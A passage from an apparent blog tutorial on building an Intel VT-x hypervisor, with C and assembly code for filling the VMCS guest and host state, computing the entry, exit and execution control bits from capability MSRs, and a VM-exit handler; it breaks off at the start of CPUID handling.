<pre><code class="lang-c"><span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">fillGdtDataItem</span><span class="hljs-params">(<span class="hljs-keyword">int</span> index, <span class="hljs-keyword">short</span> selector)</span>
</span>{
    GdtTable gdtTable = {<span class="hljs-number">0</span>};
    AsmGetGdtTable(&amp;gdtTable);
    selector &amp;= <span class="hljs-number">0xFFF8</span>;
    ULONG limit = __segmentlimit(selector);
    PULONG item = (PULONG)(gdtTable.Base + selector);
    LARGE_INTEGER itemBase = {<span class="hljs-number">0</span>};
    itemBase.LowPart = (*item &amp; <span class="hljs-number">0xFFFF0000</span>) &gt;&gt; <span class="hljs-number">16</span>;
    item++;
    itemBase.LowPart |= (*item &amp; <span class="hljs-number">0xFF000000</span>) | ((*item &amp; <span class="hljs-number">0xFF</span>) &lt;&lt; <span class="hljs-number">16</span>);

    <span class="hljs-comment">// Set attributes</span>
    ULONG attr = (*item &amp; <span class="hljs-number">0x00F0FF00</span>) &gt;&gt; <span class="hljs-number">8</span>;
    <span class="hljs-keyword">if</span> (selector == <span class="hljs-number">0</span>)
    {
        attr |= <span class="hljs-number">1</span> &lt;&lt; <span class="hljs-number">16</span>;
    }

    __vmx_vmwrite(GUEST_ES_BASE + index * <span class="hljs-number">2</span>, itemBase.QuadPart);
    __vmx_vmwrite(GUEST_ES_LIMIT + index * <span class="hljs-number">2</span>, limit);
    __vmx_vmwrite(GUEST_ES_AR_BYTES + index * <span class="hljs-number">2</span>, attr);
    __vmx_vmwrite(GUEST_ES_SELECTOR + index * <span class="hljs-number">2</span>, selector);
}
</code></pre>
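<p>The bit slicing in <code>fillGdtDataItem</code> can be tried out without a kernel. The sketch below decodes an ordinary 8-byte segment descriptor, given as its low and high 32-bit halves, into the base, the raw limit, and the access rights in the layout the VMCS expects. <code>ParsedSegment</code> and <code>parse_descriptor</code> are hypothetical names. Unlike <code>__segmentlimit</code>, this sketch returns the raw 20-bit limit without applying the granularity bit.</p>
<pre><code class="lang-c">#include &lt;stdint.h&gt;

typedef struct {
    uint32_t base;          /* bits 31:0 of the segment base */
    uint32_t limit;         /* raw 20-bit limit, not scaled by granularity */
    uint32_t access_rights; /* VMCS access-rights layout */
} ParsedSegment;

static ParsedSegment parse_descriptor(uint32_t low, uint32_t high)
{
    ParsedSegment seg;

    /* base 15:0 is low[31:16], base 23:16 is high[7:0], base 31:24 is high[31:24] */
    seg.base = (low &gt;&gt; 16) | ((high &amp; 0xFFu) &lt;&lt; 16) | (high &amp; 0xFF000000u);
    /* limit 15:0 is low[15:0], limit 19:16 is high[19:16] */
    seg.limit = (low &amp; 0xFFFFu) | (high &amp; 0x000F0000u);
    /* type/S/DPL/P from high[15:8] land in bits 7:0, AVL/L/D/G from high[23:20] in bits 15:12 */
    seg.access_rights = (high &amp; 0x00F0FF00u) &gt;&gt; 8;
    return seg;
}
</code></pre>
<p>For a typical 64-bit kernel code descriptor, <code>0x00209B0000000000</code>, this yields base 0, limit 0, and access rights <code>0x209B</code> (present, code, accessed, long mode).</p>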
<p>The GDT entry for the TR register cannot be filled in like the others, because in 64-bit mode it is 128 bits (16 bytes) wide instead of 64. It therefore needs to be handled separately. The format of the TR descriptor in 64-bit mode is explained in Chapter 3.2.1 of this <a target="_blank" href="https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-vol-1-manual.pdf">Intel white paper</a>.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1722264156712/8004bb2c-75f6-4dda-96ed-93514250096d.png" alt class="image--center mx-auto" /></p>
<p>The idea is the same as for the other GDT entries: extract the relevant bits and write them into the VMCS.</p>
<pre><code class="lang-c">GdtTable gdtTable = { <span class="hljs-number">0</span> };
AsmGetGdtTable(&amp;gdtTable);
ULONG trSelector = AsmReadTR();
trSelector &amp;= <span class="hljs-number">0xFFF8</span>;
ULONG trlimit = __segmentlimit(trSelector);
LARGE_INTEGER trBase = {<span class="hljs-number">0</span>};
PULONG trItem = (PULONG)(gdtTable.Base + trSelector);
</code></pre>
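<p>The fragment above only locates the descriptor. A minimal sketch of the remaining step, assembling the 64-bit base and the access rights from the four 32-bit words of a 16-byte system descriptor, could look like this. The function names are hypothetical, and the descriptor is passed in as an array instead of being read from the live GDT.</p>
<pre><code class="lang-c">#include &lt;stdint.h&gt;

/* d[0] and d[1] use the same layout as an 8-byte descriptor;
 * d[2] carries base bits 63:32 and d[3] is reserved. */
static uint64_t system_descriptor_base(const uint32_t d[4])
{
    uint64_t low = (d[0] &gt;&gt; 16)              /* base 15:0  */
                 | ((d[1] &amp; 0xFFu) &lt;&lt; 16)    /* base 23:16 */
                 | (d[1] &amp; 0xFF000000u);     /* base 31:24 stays in place */
    return low | ((uint64_t)d[2] &lt;&lt; 32);     /* base 63:32 */
}

/* Access rights in the layout the VMCS expects. */
static uint32_t system_descriptor_access_rights(const uint32_t d[4])
{
    return (d[1] &amp; 0x00F0FF00u) &gt;&gt; 8;
}
</code></pre>
<p>Note that the top base byte (bits 31:24 of the second word) is already in its final position and must not be shifted; shifting it would make it collide with base bits 23:16.</p>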
<p>Next come a few other special registers, which I won't go into in detail. Some of their properties can be used for virtual machine detection: after certain operations, the results observed on bare metal and inside a guest can differ, which reveals the presence of VT.</p>
<p>For example, with the MSR settings covered later, reading an MSR outside the valid range raises an exception on real hardware, but if the hypervisor does not handle that case specifically, the guest sees unpredictable results. Although Intel's design intends that software in a guest cannot tell it is running as a guest, there are still many ways to detect it.</p>
<pre><code class="lang-c">__vmx_vmwrite(GUEST_CR0, __readcr0());
__vmx_vmwrite(GUEST_CR4, __readcr4());
__vmx_vmwrite(GUEST_CR3, __readcr3());
__vmx_vmwrite(GUEST_DR7, __readdr(<span class="hljs-number">7</span>));
__vmx_vmwrite(GUEST_RFLAGS, __readeflags());
__vmx_vmwrite(GUEST_RSP, GuestEsp);
__vmx_vmwrite(GUEST_RIP, GuestEip);
__vmx_vmwrite(VMCS_LINK_POINTER, <span class="hljs-number">-1L</span>L);
__vmx_vmwrite(GUEST_IA32_DEBUGCTL, __readmsr(IA32_MSR_DEBUGCTL));
__vmx_vmwrite(GUEST_IA32_PAT, __readmsr(IA32_MSR_PAT));
__vmx_vmwrite(GUEST_IA32_EFER, __readmsr(IA32_MSR_EFER));
__vmx_vmwrite(GUEST_FS_BASE, __readmsr(IA32_FS_BASE));
__vmx_vmwrite(GUEST_GS_BASE, __readmsr(IA32_GS_BASE));
__vmx_vmwrite(GUEST_SYSENTER_CS, __readmsr(<span class="hljs-number">0x174</span>));
__vmx_vmwrite(GUEST_SYSENTER_ESP, __readmsr(<span class="hljs-number">0x175</span>));
__vmx_vmwrite(GUEST_SYSENTER_EIP, __readmsr(<span class="hljs-number">0x176</span>));
</code></pre>
<p>Filling the host-state area is similar to filling the guest-state area. Note that the host segment registers only need their selectors (plus the base for FS, GS, and TR), not the full set of attributes. Also, the host RSP must point to memory allocated specifically for it. Reusing the RSP the guest had at exit would overwrite the guest's stack and lead to unpredictable results. The code for filling the host area is as follows:</p>
<pre><code class="lang-c"><span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">VmxInitHost</span><span class="hljs-params">(ULONG64 HostEip)</span>
</span>{
    GdtTable gdtTable = { <span class="hljs-number">0</span> };
    AsmGetGdtTable(&amp;gdtTable);
    PVMXCPUPCB pVcpu = VmxGetCurrentCPUPCB();
    ULONG trSelector = AsmReadTR();
    trSelector &amp;= <span class="hljs-number">0xFFF8</span>;
    LARGE_INTEGER trBase = { <span class="hljs-number">0</span> };
    PULONG trItem = (PULONG)(gdtTable.Base + trSelector);

    <span class="hljs-comment">// Read TR</span>
    trBase.LowPart = ((trItem[<span class="hljs-number">0</span>] &gt;&gt; <span class="hljs-number">16</span>) &amp; <span class="hljs-number">0xFFFF</span>) | ((trItem[<span class="hljs-number">1</span>] &amp; <span class="hljs-number">0xFF</span>) &lt;&lt; <span class="hljs-number">16</span>) | (trItem[<span class="hljs-number">1</span>] &amp; <span class="hljs-number">0xFF000000</span>);
    trBase.HighPart = trItem[<span class="hljs-number">2</span>];

    <span class="hljs-comment">// Set TR</span>
    __vmx_vmwrite(HOST_TR_BASE, trBase.QuadPart);
    __vmx_vmwrite(HOST_TR_SELECTOR, trSelector);

    <span class="hljs-comment">// Set segment selectors</span>
    __vmx_vmwrite(HOST_ES_SELECTOR, AsmReadES() &amp; <span class="hljs-number">0xfff8</span>);
    __vmx_vmwrite(HOST_CS_SELECTOR, AsmReadCS() &amp; <span class="hljs-number">0xfff8</span>);
    __vmx_vmwrite(HOST_SS_SELECTOR, AsmReadSS() &amp; <span class="hljs-number">0xfff8</span>);
    __vmx_vmwrite(HOST_DS_SELECTOR, AsmReadDS() &amp; <span class="hljs-number">0xfff8</span>);
    __vmx_vmwrite(HOST_FS_SELECTOR, AsmReadFS() &amp; <span class="hljs-number">0xfff8</span>);
    __vmx_vmwrite(HOST_GS_SELECTOR, AsmReadGS() &amp; <span class="hljs-number">0xfff8</span>);

    <span class="hljs-comment">// Set control registers</span>
    __vmx_vmwrite(HOST_CR0, __readcr0());
    __vmx_vmwrite(HOST_CR4, __readcr4());
    __vmx_vmwrite(HOST_CR3, __readcr3());

    <span class="hljs-comment">// Set RSP and RIP</span>
    __vmx_vmwrite(HOST_RSP, (ULONG64)pVcpu-&gt;VmxHostStackBase);
    __vmx_vmwrite(HOST_RIP, HostEip);

    <span class="hljs-comment">// Set MSRs</span>
    __vmx_vmwrite(HOST_IA32_PAT, __readmsr(IA32_MSR_PAT));
    __vmx_vmwrite(HOST_IA32_EFER, __readmsr(IA32_MSR_EFER));
    __vmx_vmwrite(HOST_FS_BASE, __readmsr(IA32_FS_BASE));
    __vmx_vmwrite(HOST_GS_BASE, __readmsr(IA32_GS_BASE));
    __vmx_vmwrite(HOST_IA32_SYSENTER_CS, __readmsr(<span class="hljs-number">0x174</span>));
    __vmx_vmwrite(HOST_IA32_SYSENTER_ESP, __readmsr(<span class="hljs-number">0x175</span>));
    __vmx_vmwrite(HOST_IA32_SYSENTER_EIP, __readmsr(<span class="hljs-number">0x176</span>));

    <span class="hljs-comment">// Set GDT and IDT</span>
    GdtTable idtTable;
    __sidt(&amp;idtTable);
    __vmx_vmwrite(HOST_GDTR_BASE, gdtTable.Base);
    __vmx_vmwrite(HOST_IDTR_BASE, idtTable.Base);
}
</code></pre>
<h1 id="heading-vm-entry-controls">VM-Entry Controls</h1>
<p><a target="_blank" href="https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-vol-3c-part-3-manual.pdf">Chapter 24.8.1 of "Processor Virtualization Technology"</a> explains the VM-entry control fields and their attributes in detail. During VM entry, if the CPU detects that these fields are not filled in correctly, the VM entry fails.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1722310150055/5e821dbc-ecac-4069-b7b1-af5fd29f91b8.png" alt class="image--center mx-auto" /></p>
<p>The <code>VM_ENTRY_CONTROLS</code> field is 32 bits long, with each bit corresponding to a control function. It controls some operations performed by the processor when entering the virtual machine, such as:</p>
<ul>
<li><p>Whether to load the debug controls (DR7 and <code>IA32_DEBUGCTL</code>) when entering the virtual machine</p>
</li>
<li><p>Whether the guest runs in IA-32e mode after VM entry</p>
</li>
<li><p>Whether to load <code>IA32_PERF_GLOBAL_CTRL</code>, <code>IA32_PAT</code>, <code>IA32_EFER</code> registers, etc.</p>
</li>
</ul>
<p>The specific role of each bit is shown in Table 3-9 in the book. The book is fairly old, and newer CPUs may have added other fields. For details, please refer to the relevant chapters in the Intel white paper.</p>
<p>After examining this table, you'll notice that some positions are fixed to 1 and some are fixed to 0. Some of these are unused bits reserved for future features, so they may stop being fixed and start controlling newly introduced functions. We therefore cannot hardcode the fixed bits. Instead, we compute them from the capability MSRs and write the result into the <code>VM_ENTRY_CONTROLS</code> field.</p>
<p>To do this, read the <code>IA32_VMX_BASIC</code> MSR and check bit 55. If it is 1, use the MSRs with "TRUE" in their names (the right side of the table) for all subsequent operations. If it is 0, use the MSRs without "TRUE" (the left side).</p>
<p>In practice, many modern processors support the "TRUE" MSRs. For compatibility, though, it's necessary to check which group should be used each time.</p>
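<p>The selection step can be sketched as a pure function. The MSR indices below are the architectural ones from the Intel SDM; the macro names and <code>select_entry_ctls_msr</code> are hypothetical and differ from the identifiers used elsewhere in this article.</p>
<pre><code class="lang-c">#include &lt;stdint.h&gt;

#define MSR_IA32_VMX_ENTRY_CTLS      0x484u
#define MSR_IA32_VMX_TRUE_ENTRY_CTLS 0x490u

/* Bit 55 of IA32_VMX_BASIC reports whether the TRUE capability MSRs exist. */
static uint32_t select_entry_ctls_msr(uint64_t vmx_basic)
{
    return ((vmx_basic &gt;&gt; 55) &amp; 1) ? MSR_IA32_VMX_TRUE_ENTRY_CTLS
                                   : MSR_IA32_VMX_ENTRY_CTLS;
}
</code></pre>
<p>The same pattern applies to the pin-based, processor-based, and VM-exit capability MSRs, each of which has its own legacy and "TRUE" index.</p>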
<p>The method of setting fixed bits is described in detail in Section 2.5.5 of the book. <code>IA32_MSR_VMX_TRUE_ENTRY_CTLS</code> is a 64-bit MSR, while the <code>VM_ENTRY_CONTROLS</code> field that needs to be set is 32 bits wide.</p>
<p>When a bit in the lower 32 bits of <code>IA32_MSR_VMX_TRUE_ENTRY_CTLS</code> is 1, the corresponding bit in <code>VM_ENTRY_CONTROLS</code> must be 1. When a bit in the upper 32 bits of <code>IA32_MSR_VMX_TRUE_ENTRY_CTLS</code> is 0, the corresponding bit in <code>VM_ENTRY_CONTROLS</code> must be 0.</p>
<pre><code class="lang-c"><span class="hljs-function">ULONG64 <span class="hljs-title">VmxAdjustControls</span><span class="hljs-params">(ULONG64 value, ULONG64 msr)</span>
</span>{
    LARGE_INTEGER msrValue;
    msrValue.QuadPart = __readmsr(msr);
    value = (msrValue.LowPart | value) &amp; msrValue.HighPart;
    <span class="hljs-keyword">return</span> value;
}
</code></pre>
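<p>One consequence of this adjustment is that a requested bit the processor does not support is silently cleared. A possible way to notice that, sketched here with hypothetical names and a made-up capability value, is to compare the adjusted result against the request:</p>
<pre><code class="lang-c">#include &lt;stdbool.h&gt;
#include &lt;stdint.h&gt;

/* Same rule as VmxAdjustControls, but on a capability value passed in directly. */
static uint32_t adjust_controls(uint32_t requested, uint64_t capability)
{
    uint32_t must_be_one = (uint32_t)capability;         /* low 32 bits  */
    uint32_t may_be_one  = (uint32_t)(capability &gt;&gt; 32); /* high 32 bits */

    return (requested | must_be_one) &amp; may_be_one;
}

/* True when every requested bit survived the adjustment. */
static bool controls_supported(uint32_t requested, uint64_t capability)
{
    return (adjust_controls(requested, capability) &amp; requested) == requested;
}
</code></pre>
<p>With the illustrative capability value <code>0x0000F3FF000011FF</code>, requesting <code>0x200</code> yields <code>0x13FF</code> and is reported as supported, while requesting <code>0x400</code> yields <code>0x11FF</code> and is reported as unsupported because bit 10 is not allowed to be 1.</p>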
<p>When first building the framework, only bit 9 needs to be requested, so that the guest runs in IA-32e mode. The other bits can be left unset at the beginning. That doesn't make them unimportant: bit 2, for example, specifies whether to load the debug controls when entering the virtual machine, and careful use of it can enable some special debugging features.</p>
<pre><code class="lang-c"><span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">ConfigureVmEntryControls</span><span class="hljs-params">()</span>
</span>{
    ULONG64 vmxBasic = __readmsr(IA32_VMX_BASIC);
    ULONG64 msr = ((vmxBasic &gt;&gt; <span class="hljs-number">55</span>) &amp; <span class="hljs-number">1</span>) ? IA32_MSR_VMX_TRUE_ENTRY_CTLS : IA32_MSR_VMX_ENTRY_CTLS;
    ULONG64 entryControls = VmxAdjustControls(<span class="hljs-number">0x200</span>, msr);  <span class="hljs-comment">// 0x200 enables IA-32e mode</span>
    __vmx_vmwrite(VM_ENTRY_CONTROLS, entryControls);
}
</code></pre>
<p>Chapter 3.6.2 of "Processor Virtualization Technology" describes the VM-entry MSR-load fields (a count and an address). They control whether MSRs are loaded from a list when entering the virtual machine. We don't need this, because VM exits and entries are frequent and loading MSRs every time would reduce performance. If we want to intercept or hook MSR accesses, there are other methods. The count can therefore be set to 0.</p>
<p>Next is <code>VM_ENTRY_INTR_INFO_FIELD</code>, described in Chapter 3.6.3.1. When this field is filled in according to certain rules, the corresponding interrupt or exception is delivered to the guest on VM entry. We don't need this for now. If the highest bit (bit 31, the valid bit) is 0, the field is ignored, so it can simply be set to 0. When we need event injection in the future, we can deal with it accordingly.</p>
<pre><code class="lang-c"><span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">InitializeVmEntrySettings</span><span class="hljs-params">()</span>
</span>{
    ConfigureVmEntryControls();
    __vmx_vmwrite(VM_ENTRY_MSR_LOAD_COUNT, <span class="hljs-number">0</span>);
    __vmx_vmwrite(VM_ENTRY_INTR_INFO_FIELD, <span class="hljs-number">0</span>);
}
</code></pre>
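<p>For reference, here is a minimal sketch of how a non-zero value for the interruption-information field is put together when event injection is eventually needed. It assumes the layout from the Intel SDM (vector in bits 7:0, type in bits 10:8, deliver-error-code in bit 11, valid in bit 31); the function name is hypothetical.</p>
<pre><code class="lang-c">#include &lt;stdbool.h&gt;
#include &lt;stdint.h&gt;

/* Builds a valid VM-entry interruption-information value. */
static uint32_t make_entry_interruption_info(uint8_t vector, uint8_t type,
                                             bool deliver_error_code)
{
    return (uint32_t)vector
         | ((uint32_t)(type &amp; 7u) &lt;&lt; 8)
         | (deliver_error_code ? (1u &lt;&lt; 11) : 0u)
         | (1u &lt;&lt; 31);                     /* valid bit */
}
</code></pre>
<p>For example, injecting a general protection fault (vector 13, type 3 for hardware exception, with an error code) gives <code>0x80000B0D</code>. The error code itself goes into a separate VMCS field.</p>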
<h1 id="heading-vm-exit-controls">VM-Exit Controls</h1>
<p>The VM-exit control fields are very similar to the VM-entry ones. They specify the operations to be performed when exiting the virtual machine. Operations on VM entry and VM exit often come in pairs: for example, if MSRs are saved on VM exit, they can be loaded again on VM entry.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1722310374543/d4143bcd-42d2-4cfe-bb4d-fdfeb7c632b2.jpeg" alt class="image--center mx-auto" /></p>
<p>"<a target="_blank" href="https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-vol-3c-part-3-manual.pdf">Section 24.7.1, VM-Exit Controls</a>" describes the rules for filling the VM-exit fields, which generally mirror the VM-entry rules. Two points to note:</p>
<ol>
<li><p>Bit 15 (acknowledge interrupt on exit) specifies whether the processor acknowledges the interrupt controller and saves the interrupt vector when a VM exit is caused by an external interrupt. Either setting works, but setting it to 1 makes the vector available for later use and won't affect performance.</p>
</li>
<li><p>Bit 22 (save VMX-preemption timer value) relates to a timer-like feature. Many CPUs do not support it, so for compatibility it's recommended not to use it.</p>
</li>
</ol>
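<p>The article does not show code for the VM-exit controls, so the following is only a sketch of one plausible setup under stated assumptions. It requests bit 15 as suggested above, leaves bit 22 clear, and also requests bit 9 ("host address-space size"), which the Intel SDM requires for a 64-bit host. The macro and function names are hypothetical, and the capability MSR value is passed in as a parameter.</p>
<pre><code class="lang-c">#include &lt;stdint.h&gt;

#define VM_EXIT_HOST_ADDR_SPACE_SIZE (1u &lt;&lt; 9)  /* host runs in 64-bit mode */
#define VM_EXIT_ACK_INTR_ON_EXIT     (1u &lt;&lt; 15)
#define VM_EXIT_SAVE_PREEMPT_TIMER   (1u &lt;&lt; 22) /* deliberately not requested */

/* Applies the fixed-bit rule to the requested VM-exit controls. */
static uint32_t build_exit_controls(uint64_t exit_capability)
{
    uint32_t requested   = VM_EXIT_HOST_ADDR_SPACE_SIZE | VM_EXIT_ACK_INTR_ON_EXIT;
    uint32_t must_be_one = (uint32_t)exit_capability;
    uint32_t may_be_one  = (uint32_t)(exit_capability &gt;&gt; 32);

    return (requested | must_be_one) &amp; may_be_one;
}
</code></pre>
<p>In a driver, the capability value would come from the VM-exit capability MSR chosen via bit 55 of <code>IA32_VMX_BASIC</code>, and the result would be written to the VM-exit controls field with <code>__vmx_vmwrite</code>.</p>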
<p>Then we get to the VM-execution control fields, which determine which events are intercepted and which are not.</p>
<pre><code class="lang-c"><span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">InitializeVmExecutionControls</span><span class="hljs-params">()</span>
</span>{
    ULONG64 vmxBasic = __readmsr(IA32_VMX_BASIC);
    ULONG64 pinBasedMsr = ((vmxBasic &gt;&gt; <span class="hljs-number">55</span>) &amp; <span class="hljs-number">1</span>) ? IA32_MSR_VMX_TRUE_PINBASED_CTLS : IA32_MSR_VMX_PINBASED_CTLS;
    ULONG64 procBasedMsr = ((vmxBasic &gt;&gt; <span class="hljs-number">55</span>) &amp; <span class="hljs-number">1</span>) ? IA32_MSR_VMX_TRUE_PROCBASED_CTLS : IA32_MSR_VMX_PROCBASED_CTLS;

    ULONG64 pinBasedControls = VmxAdjustControls(<span class="hljs-number">0</span>, pinBasedMsr);
    ULONG64 procBasedControls = VmxAdjustControls(<span class="hljs-number">0</span>, procBasedMsr);

    __vmx_vmwrite(PIN_BASED_VM_EXEC_CONTROL, pinBasedControls);
    __vmx_vmwrite(CPU_BASED_VM_EXEC_CONTROL, procBasedControls);
}
</code></pre>
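<p>The adjustment step used above can be sketched in isolation. This is a minimal sketch, assuming <code>VmxAdjustControls</code> follows the usual capability-MSR rule (low 32 bits are the bits that must be 1, high 32 bits are the bits that may be 1). The name <code>adjust_controls</code> is hypothetical, and it takes the raw MSR value as a parameter instead of reading the MSR, so it can be tried in user mode.</p>

```c
#include <stdint.h>

/* Hypothetical stand-in for VmxAdjustControls: works on the raw 64-bit value
 * of a VMX capability MSR rather than reading the MSR itself. */
static uint32_t adjust_controls(uint32_t requested, uint64_t capability_msr)
{
    uint32_t must_be_one = (uint32_t)(capability_msr & 0xFFFFFFFFu); /* allowed-0 settings */
    uint32_t may_be_one  = (uint32_t)(capability_msr >> 32);         /* allowed-1 settings */

    requested |= must_be_one; /* force the bits the CPU requires to be 1 */
    requested &= may_be_one;  /* drop the bits the CPU does not allow to be 1 */
    return requested;
}
```

<p>Passing <code>0</code> as the requested value, as the function above does, yields the minimal set of controls the processor insists on.</p>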
<p>When the VMCS was written earlier, the host RIP was set to the address of the VM-exit handler, so that is where execution lands when a VM exit returns control to the host. This function must save all general-purpose registers on entry and restore them before resuming the virtual machine. If the guest's register contents differ between the exit and the resume, the results are unpredictable. For that reason, the handler must be a naked function written in assembly.</p>
<pre><code class="lang-c">VmExitHandlerAsm PROC
    push r15;
    push r14;
    push r13;
    push r12;
    push r11;
    push r10;
    push r9;
    push r8;
    push rdi;
    push rsi;
    push rbp;
    push rsp;
    push rbx;
    push rdx;
    push rcx;
    push rax;

    mov rcx,rsp;
    sub rsp,<span class="hljs-number">0100</span>h
    call VmxExitHandler
    add rsp,<span class="hljs-number">0100</span>h;

    pop rax;
    pop rcx;
    pop rdx;
    pop rbx;
    pop rsp;
    pop rbp;
    pop rsi;
    pop rdi;
    pop r8;
    pop r9;
    pop r10;
    pop r11;
    pop r12;
    pop r13;
    pop r14;
    pop r15;
    vmresume
    ret
VmExitHandlerAsm ENDP
</code></pre>
<p>The process is as follows:</p>
<ol>
<li><p>Save all registers</p>
</li>
<li><p>Call a C function (<code>VmxExitHandler</code>) for detailed event handling</p>
</li>
<li><p>Restore all registers</p>
</li>
<li><p>Resume VM execution using the <code>vmresume</code> instruction</p>
</li>
</ol>
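<p>The push order in the stub determines what the C handler sees through its context pointer. The sketch below is an assumption inferred from that order: the last register pushed (<code>rax</code>) sits at the lowest address, so the slots line up with the x86-64 register encoding (0 = rax, 1 = rcx, 2 = rdx, 3 = rbx, 4 = rsp, ...). <code>GuestContextSketch</code> and <code>context_register</code> are hypothetical names, not the article's actual definitions.</p>

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical layout matching the push order of the assembly stub. */
typedef struct GuestContextSketch {
    uint64_t mRax, mRcx, mRdx, mRbx;
    uint64_t mRsp; /* host stack value pushed by the stub, not the guest RSP */
    uint64_t mRbp, mRsi, mRdi;
    uint64_t mR8, mR9, mR10, mR11, mR12, mR13, mR14, mR15;
} GuestContextSketch;

/* Look up a saved register by its hardware encoding (0..15). */
static uint64_t context_register(const GuestContextSketch *ctx, unsigned encoding)
{
    return ((const uint64_t *)ctx)[encoding & 15u];
}
```

<p>Because slot 4 holds the stub's own stack pointer, the guest's RSP still has to come from the VMCS guest RSP field.</p>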
<p>Next, we need to know what causes a VM exit. The manual lists the instructions that unconditionally cause VM exits: inside the virtual machine, every VMX instruction except <code>VMFUNC</code> causes a VM exit unconditionally, and so do <code>CPUID</code>, <code>GETSEC</code>, <code>INVD</code>, and <code>XSETBV</code>.</p>
<p>In 24.9.1 Basic VM-Exit Information, you can find the corresponding vmexit information fields in the control area. These include exit reason, instruction length causing the exit, and instruction information. The vm-instruction error field in the read-only fields will be set when a vm instruction fails.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1722267706229/0da624e1-b3b9-49be-9666-1a6f30fe0511.png" alt class="image--center mx-auto" /></p>
<p>The exit reason field composition is described in 3.10.1.1. Bits 0-15 hold the basic exit reason, and the remaining bits carry other flags. We should mask off those other bits and decide on the exit reason from bits 0-15 only.</p>
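<p>As a small sketch of that masking, the helpers below split a raw exit-reason value into the basic reason (bits 0-15) and the VM-entry failure flag (bit 31). The function names are hypothetical.</p>

```c
#include <stdbool.h>
#include <stdint.h>

/* Bits 0-15 of the exit reason field: the basic exit reason. */
static uint16_t basic_exit_reason(uint64_t raw_exit_reason)
{
    return (uint16_t)(raw_exit_reason & 0xFFFFu);
}

/* Bit 31 of the exit reason field: set when the exit is a VM-entry failure. */
static bool is_vm_entry_failure(uint64_t raw_exit_reason)
{
    return ((raw_exit_reason >> 31) & 1u) != 0;
}
```

<p>Switching on the masked value rather than the raw field keeps the flag bits from breaking the comparison against the exit reason constants.</p>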
<p>The vmexit event handling function framework includes:</p>
<ol>
<li><p>Getting the instruction length, instruction information, guest RIP and guest RSP</p>
</li>
<li><p>Getting the event code</p>
</li>
<li><p>Handling the event accordingly</p>
</li>
<li><p>Incrementing rip by the instruction length</p>
</li>
<li><p>Writing back rip and rsp and returning to continue execution at the next instruction</p>
</li>
</ol>
<p>Since we don't plan to implement nested VT, we need to report an error for VMX instructions executed in the guest. When a VMX instruction fails, CF and ZF are not both 0; only a successful VMX instruction leaves both CF and ZF at 0. To make the guest realize that it cannot enter a VT environment of its own, we set CF and ZF to 1.</p>
<pre><code class="lang-c"><span class="hljs-comment">// VM Exit Handler</span>
<span class="hljs-function">EXTERN_C VOID <span class="hljs-title">VmxExitHandler</span><span class="hljs-params">(PGuestContext context)</span>
</span>{
    ULONG64 reason = <span class="hljs-number">0</span>;
    ULONG64 instLen = <span class="hljs-number">0</span>;
    ULONG64 instinfo = <span class="hljs-number">0</span>;
    ULONG64 mrip = <span class="hljs-number">0</span>;
    ULONG64 mrsp = <span class="hljs-number">0</span>;

    __vmx_vmread(VM_EXIT_REASON, &amp;reason);
    __vmx_vmread(VM_EXIT_INSTRUCTION_LEN, &amp;instLen);
    __vmx_vmread(VMX_INSTRUCTION_INFO, &amp;instinfo);
    __vmx_vmread(GUEST_RIP, &amp;mrip);
    __vmx_vmread(GUEST_RSP, &amp;mrsp);

    reason = reason &amp; <span class="hljs-number">0xFFFF</span>;

    <span class="hljs-keyword">switch</span> (reason)
    {
        <span class="hljs-keyword">case</span> EXIT_REASON_CPUID:
        <span class="hljs-keyword">case</span> EXIT_REASON_GETSEC:
        <span class="hljs-keyword">case</span> EXIT_REASON_INVD:
        <span class="hljs-keyword">case</span> EXIT_REASON_VMCALL:
        <span class="hljs-keyword">case</span> EXIT_REASON_VMCLEAR:
        <span class="hljs-keyword">case</span> EXIT_REASON_VMLAUNCH:
        <span class="hljs-keyword">case</span> EXIT_REASON_VMPTRLD:
        <span class="hljs-keyword">case</span> EXIT_REASON_VMPTRST:
        <span class="hljs-keyword">case</span> EXIT_REASON_VMREAD:
        <span class="hljs-keyword">case</span> EXIT_REASON_VMRESUME:
        <span class="hljs-keyword">case</span> EXIT_REASON_VMWRITE:
        <span class="hljs-keyword">case</span> EXIT_REASON_VMXOFF:
        <span class="hljs-keyword">case</span> EXIT_REASON_VMXON:
        <span class="hljs-keyword">case</span> EXIT_REASON_MSR_READ:
        <span class="hljs-keyword">case</span> EXIT_REASON_MSR_WRITE:
        <span class="hljs-keyword">case</span> EXIT_REASON_XSETBV:
            <span class="hljs-comment">// Handle these events</span>
            <span class="hljs-keyword">break</span>;
    }

    __vmx_vmwrite(GUEST_RIP, mrip + instLen);
    __vmx_vmwrite(GUEST_RSP, mrsp);
}
</code></pre>
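<p>The handler above leaves the "handle these events" step open. For the VMX instruction cases, the flag manipulation described earlier (setting CF and ZF to 1) could look like the sketch below. It operates on a plain RFLAGS value; in the real handler the value would presumably be read from and written back to the guest RFLAGS field of the VMCS. The helper names are hypothetical.</p>

```c
#include <stdint.h>

#define RFLAGS_CF (1ull << 0) /* carry flag */
#define RFLAGS_ZF (1ull << 6) /* zero flag  */

/* Mark a guest VMX instruction as failed by setting CF and ZF. */
static uint64_t mark_vmx_failure(uint64_t guest_rflags)
{
    return guest_rflags | RFLAGS_CF | RFLAGS_ZF;
}

/* A VMX instruction succeeded only if both CF and ZF are clear. */
static int vmx_succeeded(uint64_t rflags)
{
    return (rflags & (RFLAGS_CF | RFLAGS_ZF)) == 0;
}
```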
<p>Next up: <code>CPUID</code> always causes a VM exit. If you don't need to alter its behavior, you can simply execute <code>CPUID</code> in the handler and return the result to the guest. The handler runs in the host environment, so executing <code>CPUID</code> there does not trigger another VM exit.</p>
<pre><code class="lang-c"><span class="hljs-comment">// Handle CPUID instruction</span>
